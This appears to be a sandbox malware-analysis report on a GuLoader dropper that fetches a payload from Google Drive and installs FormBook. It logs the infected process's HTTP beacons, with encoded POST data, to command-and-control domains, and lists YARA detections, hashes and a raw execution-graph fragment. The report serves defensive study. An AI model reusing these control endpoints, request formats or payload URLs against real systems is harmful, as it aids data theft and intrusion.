May 22, 2024 17:36:17.064157963 CEST | 485 | OUT | GET /op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.shortfox.top
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 22, 2024 17:36:17.286336899 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:36:17 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.11.30 | 49850 | 37.140.192.90 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 17:36:22.652529955 CEST | 756 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tNwWPAv0cUZBOP4IpWfR9wh6dddNPDLZNnOj7SfcnKyxQJbwtbf+bECQpFEyKsGAes4oVnafNBngSlO+BvIXGngvAGloPv/WwUHYveSTFJt/K5qykoZ12V+s4Xa+YO0Qoze0N7B4IobHRNtBYsAuGek2ZgowgYwWNkVDw0Ic/ieU/X8AG6LNmQ==
May 22, 2024 17:36:23.026519060 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:22 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.11.30 | 49851 | 37.140.192.90 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 17:36:25.526063919 CEST | 776 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=dDseV0xGqIQ9tu4WImn0NEZAS/4Ii2fV9wt6dcYIPxvZMFWjqjfcpqyxEZbxwrfpbEGYpBEyKs6AeuwoVQuYXxniUlO8ffIXGngvAGhOPvXWwkXYt/SSbZt+L5qyzYZx2V/L4WGUYNAQo2i0Mp55fYaMVNsNXpleA9kpXCAp+5lzBTkZt38esCi5jWRoE4KW7Qr5YW+vHOoW4r3DqWPeuaY=
                                                                        May 22, 2024 17:36:25.902326107 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:25 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        56 | 192.168.11.30 | 49852 | 37.140.192.90 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:36:28.400497913 CEST | 1693 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.ng-bo.online
                                                                        Origin: http://www.ng-bo.online
                                                                        Referer: http://www.ng-bo.online/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:36:28.770644903 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:28 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        57 | 192.168.11.30 | 49853 | 37.140.192.90 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:36:31.276565075 CEST | 485 | OUT | GET /op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.ng-bo.online
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:36:31.646790028 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:31 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        58 | 192.168.11.30 | 49854 | 35.213.232.35 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:36:38.705823898 CEST | 768 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.getgoodscrub.com
                                                                        Origin: http://www.getgoodscrub.com
                                                                        Referer: http://www.getgoodscrub.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=XGi0OyOJM8WrBktzfT8kkhWXNIgAhfnvB9dlwFt9yXUE/UDioWUq55gh6XQlqNNAoCLsHhu3dwjXhyjKY2k2hcTTw6sG0ZgbxPVKpy9PCgqNwwPlfVkjrRQ1eJJMJezEBsW3D4T92x4SzBVNEyLoa9pqGh2h2il4CLazGYWjf31vbHCWx0+xD567wf3Luw/GQQ==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        59 | 192.168.11.30 | 49855 | 35.213.232.35 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:36:41.668322086 CEST | 788 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.getgoodscrub.com
                                                                        Origin: http://www.getgoodscrub.com
                                                                        Referer: http://www.getgoodscrub.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=XGi0OyOJM8WrBE9zewkkshWYTYgAr/mHB9RlwEpLzhsE42ripSAq65gh03Rv3dN9oC3OHg+3dwfXhzTKYF81usTN7asA55gbxPVKpy5hCgyNwDXlQUkshxRHdJJMDOzABsXYD4iq238SzEpNEnnrPNpgIB3kx3crZ5mOH4qZd25HTwzMs3KzQZGWseajsy+dNcTSgGbvS3pmVcypS3ieCpY=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        60 | 192.168.11.30 | 49856 | 35.213.232.35 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:36:44.641021013 CEST | 1705 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.getgoodscrub.com
                                                                        Origin: http://www.getgoodscrub.com
                                                                        Referer: http://www.getgoodscrub.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        61 | 192.168.11.30 | 49857 | 35.213.232.35 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:36:47.604533911 CEST | 501 | OUT | GET /op6t/?nvddg=aEKUNFeJbfSYXwp4ZCE5pj6NM5Y9npuXTcZZ2VZLyy8DmHHct0wY69Uf2FlN/+Mr5yqkWwSEcnLthRGoVw08meHK6rNA3rJY5N4rrVRcMXWX5QnofEk8vUc=&iXoT=lfKx4XoXw4a8lZu HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.getgoodscrub.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        0 | 192.168.11.30 | 49793 | 142.250.69.206 | 443 | 4956 | C:\Users\user\Desktop\FRA.0038253.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-05-22 15:30:28 UTC | 216 | OUT | GET /uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        2024-05-22 15:30:28 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Wed, 22 May 2024 15:30:28 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Security-Policy: script-src 'nonce-6GYCVtjI_HcJtTRB3Df4WQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        1 | 192.168.11.30 | 49794 | 142.251.33.97 | 443 | 4956 | C:\Users\user\Desktop\FRA.0038253.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-05-22 15:30:29 UTC | 258 | OUT | GET /download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        2024-05-22 15:30:30 UTC | 4818 | IN | HTTP/1.1 200 OK
                                                                        Content-Type: application/octet-stream
                                                                        Content-Security-Policy: sandbox
                                                                        Content-Security-Policy: default-src 'none'
                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                        X-Content-Security-Policy: sandbox
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                        Cross-Origin-Resource-Policy: same-site
                                                                        X-Content-Type-Options: nosniff
                                                                        Content-Disposition: attachment; filename="NFjfCaZXAaJahT109.bin"
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Credentials: false
                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 270400
                                                                        Last-Modified: Wed, 22 May 2024 09:33:10 GMT
                                                                        X-GUploader-UploadID: ABPtcPoG_qlquJSXTVZKLUecERwWl_feafxazszYHEpcmAG3MxNRL0L_WIczDsSepKnhTaKTeIWUWt1hgg
                                                                        Date: Wed, 22 May 2024 15:30:30 GMT
                                                                        Expires: Wed, 22 May 2024 15:30:30 GMT
                                                                        Cache-Control: private, max-age=0
                                                                        X-Goog-Hash: crc32c=m3F2TQ==
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Target ID:0
                                                                        Start time:11:29:29
                                                                        Start date:22/05/2024
                                                                        Path:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\FRA.0038253.exe"
                                                                        Imagebase:0x400000
                                                                        File size:587'552 bytes
                                                                        MD5 hash:B07B3994AD66A39937D9081EB64CD5F5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2678094371.0000000007F78000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:11:30:11
                                                                        Start date:22/05/2024
                                                                        Path:C:\Users\user\Desktop\FRA.0038253.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\FRA.0038253.exe"
                                                                        Imagebase:0x400000
                                                                        File size:587'552 bytes
                                                                        MD5 hash:B07B3994AD66A39937D9081EB64CD5F5
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:11:30:50
                                                                        Start date:22/05/2024
                                                                        Path:C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe"
                                                                        Imagebase:0x230000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:5
                                                                        Start time:11:30:52
                                                                        Start date:22/05/2024
                                                                        Path:C:\Windows\SysWOW64\runas.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\runas.exe"
                                                                        Imagebase:0x890000
                                                                        File size:17'920 bytes
                                                                        MD5 hash:3C9AD13D268D1DFB106DD8C2017478C2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Target ID:6
                                                                        Start time:11:31:05
                                                                        Start date:22/05/2024
                                                                        Path:C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe"
                                                                        Imagebase:0x230000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Target ID:7
                                                                        Start time:11:31:16
                                                                        Start date:22/05/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff639d90000
                                                                        File size:687'008 bytes
                                                                        MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:19.9%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:16.5%
                                                                          Total number of Nodes:1579
                                                                          Total number of Limit Nodes:35
5593 404ce7 5594 40140b 2 API calls 5593->5594 5595 404cf0 5594->5595 5603 406257 lstrcpynA 5595->5603 5597 404cf7 5597->5577 5604 404b40 5598->5604 5600 404c1a 5600->5551 5601->5591 5602->5593 5603->5597 5605 404b56 5604->5605 5606 4062ea 21 API calls 5605->5606 5607 404bba 5606->5607 5608 4062ea 21 API calls 5607->5608 5609 404bc5 5608->5609 5610 4062ea 21 API calls 5609->5610 5611 404bdb lstrlenA wsprintfA SetDlgItemTextA 5610->5611 5611->5600 5158 403dfd 5159 403e15 5158->5159 5160 403f76 5158->5160 5159->5160 5161 403e21 5159->5161 5162 403fc7 5160->5162 5163 403f87 GetDlgItem GetDlgItem 5160->5163 5164 403e2c SetWindowPos 5161->5164 5165 403e3f 5161->5165 5167 404021 5162->5167 5172 401389 2 API calls 5162->5172 5166 4042f7 22 API calls 5163->5166 5164->5165 5169 403e48 ShowWindow 5165->5169 5170 403e8a 5165->5170 5171 403fb1 SetClassLongA 5166->5171 5168 404343 SendMessageA 5167->5168 5173 403f71 5167->5173 5198 404033 5168->5198 5174 403f63 5169->5174 5175 403e68 GetWindowLongA 5169->5175 5176 403e92 DestroyWindow 5170->5176 5177 403ea9 5170->5177 5178 40140b 2 API calls 5171->5178 5179 403ff9 5172->5179 5180 40435e 8 API calls 5174->5180 5175->5174 5181 403e81 ShowWindow 5175->5181 5182 404280 5176->5182 5183 403eae SetWindowLongA 5177->5183 5184 403ebf 5177->5184 5178->5162 5179->5167 5186 403ffd SendMessageA 5179->5186 5180->5173 5181->5170 5182->5173 5191 4042b1 ShowWindow 5182->5191 5183->5173 5184->5174 5185 403ecb GetDlgItem 5184->5185 5189 403ef9 5185->5189 5190 403edc SendMessageA IsWindowEnabled 5185->5190 5186->5173 5187 40140b 2 API calls 5187->5198 5188 404282 DestroyWindow EndDialog 5188->5182 5193 403f06 5189->5193 5194 403f4d SendMessageA 5189->5194 5195 403f19 5189->5195 5205 403efe 5189->5205 5190->5173 5190->5189 5191->5173 5192 4062ea 21 API calls 5192->5198 5193->5194 5193->5205 5194->5174 5199 403f21 5195->5199 5200 403f36 5195->5200 5196 4042d0 SendMessageA 5201 403f34 5196->5201 5197 4042f7 22 API calls 5197->5198 5198->5173 
